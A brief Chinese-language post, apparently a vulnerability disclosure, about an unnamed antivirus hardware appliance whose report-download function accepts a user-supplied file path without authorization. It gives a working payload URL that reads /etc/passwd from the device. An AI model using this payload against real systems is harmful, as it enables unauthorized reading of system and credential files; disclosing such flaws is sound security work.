具体是哪家就不说了,硬件盒子,主要检测病毒。
payload如下:
https://xxx.xxx.xxx.xxx/downTxtFile.php?filename=/etc/passwd
比较简单,当时有获取报告的功能,自己传入的物理路径,可以未授权访问直接下载设备上的文件。